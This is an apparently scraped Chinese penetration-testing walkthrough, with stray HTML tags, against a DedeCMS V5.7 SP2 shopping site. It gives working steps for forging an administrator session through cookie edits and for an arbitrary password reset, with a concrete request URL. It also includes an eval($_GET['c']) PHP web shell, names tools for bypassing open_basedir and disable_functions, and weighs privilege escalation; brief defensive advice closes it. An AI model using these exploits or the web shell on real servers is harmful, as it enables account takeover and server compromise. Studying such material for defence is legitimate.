DedeCMS渗透测试实战教学文档<\/h1>

1. 信息收集阶段<\/h2>

1.1 初步识别<\/h3>
目标系统：DedeCMS V5.7 SP2<\/li>
中间件：Nginx<\/li>
网站类型：购物商城类站点<\/li> <\/ul>
1.2 后台探测<\/h3>
默认后台路径\/dede<\/code>返回404，说明管理员已修改默认后台路径<\/li>
检查网站最后更新时间可帮助确定CMS版本<\/li>
<\/ul>
2. DedeCMS漏洞利用<\/h2>
2.1 前台管理员密码重置漏洞组合利用<\/h3>
步骤1：注册特殊用户<\/h4>

注册用户名为00001<\/code>的账户<\/li>
intval('00001')<\/code>结果为1，对应管理员ID<\/li>
<\/ul>
步骤2：获取认证信息<\/h4>

访问用户页面：\/member\/index.php?uid=00001<\/code><\/li>
从响应包中获取last_vid__ckMd5<\/code>值<\/li>
<\/ol>
步骤3：伪造管理员会话<\/h4>

访问\/member\/<\/code><\/li>
修改Cookie：

DedeUserID<\/code>改为0001<\/code><\/li>
DedeUserID__ckMd5<\/code>改为之前获取的last_vid__ckMd5<\/code>值<\/li>
<\/ul>
<\/li>
成功登录管理员账户<\/li>
<\/ol>
2.2 任意用户密码重置漏洞<\/h3>
步骤1：生成重置密钥<\/h4>
访问URL：<\/p>
http:\/\/X.X.X.X\/member\/resetpassword.php?dopost=safequestion&safequestion=0.0&safeanswer=&id=1
<\/code><\/pre>
步骤2：快速跳转<\/h4>

页面会短暂显示跳转链接<\/li>
快速点击"立即跳转"进入密码重置页面<\/li>
<\/ul>
注意事项：<\/h4>

此漏洞只能修改dede_member<\/code>表中的密码<\/li>
管理员密码实际存储在dede_admin<\/code>表中<\/li>
需在前台账户设置中再次修改密码才能真正更改管理员密码<\/li>
<\/ul>
3. 后台路径发现<\/h2>
3.1 数据库报错文件分析<\/h3>

DedeCMS在data<\/code>目录下存在mysqli_error_trace.inc<\/code>文件<\/li>
该文件记录MySQL查询错误，可能暴露后台路径<\/li>
<\/ul>
3.2 旁站信息收集<\/h3>

通过真实IP反查域名<\/li>
查找使用相同CMS的旁站<\/li>
尝试在旁站上寻找数据库报错文件<\/li>
将发现的路径应用到主站<\/li>
<\/ol>
4. 绕过安全限制<\/h2>
4.1 绕过open_basedir限制<\/h3>
方法1：使用专用代码<\/h4>
<?<\/span>php<\/span> 
<\/span><\/span>echo<\/span> 'open_basedir: '<\/span> .<\/span> ini_get<\/span>('open_basedir'<\/span>) .<\/span> '<br>'<\/span>;
<\/span><\/span>echo<\/span> 'GET: '<\/span> .<\/span> $_GET['c'<\/span>] .<\/span> '<br>'<\/span>;
<\/span><\/span>eval<\/span>($_GET['c'<\/span>]);
<\/span><\/span>echo<\/span> 'open_basedir: '<\/span> .<\/span> ini_get<\/span>('open_basedir'<\/span>);
<\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>方法2：使用哥斯拉工具<\/h4>

哥斯拉内置了bypass open_basedir插件<\/li>
<\/ul>
4.2 绕过disable_functions限制<\/h3>
环境分析：<\/h4>

服务器：Linux<\/li>
PHP运行模式：FPM\/FastCGI<\/li>
当前目录可写<\/li>
<\/ul>
PHP-FPM绕过方法：<\/h4>

使用蚁剑的绕过disable_functions插件<\/li>
选择PHP-FPM\/FastCGI模式<\/li>
指定FPM地址（如\/tmp<\/code>目录）<\/li>
成功后会生成.antproxy.php<\/code>代理文件<\/li>
创建副本并连接该代理文件<\/li>
<\/ol>
禁用函数列表：<\/h4>
passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,
proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,
readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,
pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,
pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,
pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,
pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,
pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
imap_open,apache_setenv
<\/code><\/pre>
5. 提权尝试<\/h2>
5.1 发现phpMyAdmin<\/h3>

发现存在phpmyadmin<\/code>目录<\/li>
宝塔面板默认在888端口搭建phpMyAdmin<\/li>
目标未开放888端口<\/li>
<\/ul>
5.2 限制因素<\/h3>

bypass后的shell连接不稳定（约2分钟断开）<\/li>
存在宝塔面板，提权风险较高<\/li>
<\/ul>
6. 关键知识点总结<\/h2>


DedeCMS漏洞组合利用<\/strong>：<\/p>

前台用户ID处理漏洞<\/li>
任意用户密码重置漏洞<\/li>
需注意密码存储在不同表中<\/li>
<\/ul>
<\/li>

旁站信息收集技巧<\/strong>：<\/p>

同类型站点往往有相似目录结构<\/li>
数据库报错文件可能泄露关键路径<\/li>
<\/ul>
<\/li>

安全限制绕过<\/strong>：<\/p>

open_basedir限制绕过方法<\/li>
disable_functions绕过技术（特别是PHP-FPM方式）<\/li>
<\/ul>
<\/li>

渗透测试策略<\/strong>：<\/p>

当主站防护严格时，旁站可能成为突破口<\/li>
系统环境分析对选择绕过方法至关重要<\/li>
<\/ul>
<\/li>
<\/ol>
7. 防御建议<\/h2>


针对DedeCMS<\/strong>：<\/p>

及时更新到最新版本<\/li>
修改默认后台路径<\/li>
限制会员注册功能<\/li>
<\/ul>
<\/li>

服务器安全<\/strong>：<\/p>

定期检查并清理数据库报错文件<\/li>
合理配置open_basedir和disable_functions<\/li>
监控\/tmp目录异常文件<\/li>
<\/ul>
<\/li>

网络架构<\/strong>：<\/p>

避免同IP下部署多个相似站点<\/li>
对旁站进行同等安全防护<\/li>
<\/ul>
<\/li>

应急响应<\/strong>：<\/p>

建立webshell检测机制<\/li>
对异常管理员登录行为进行告警<\/li>
<\/ul>
<\/li>
<\/ol>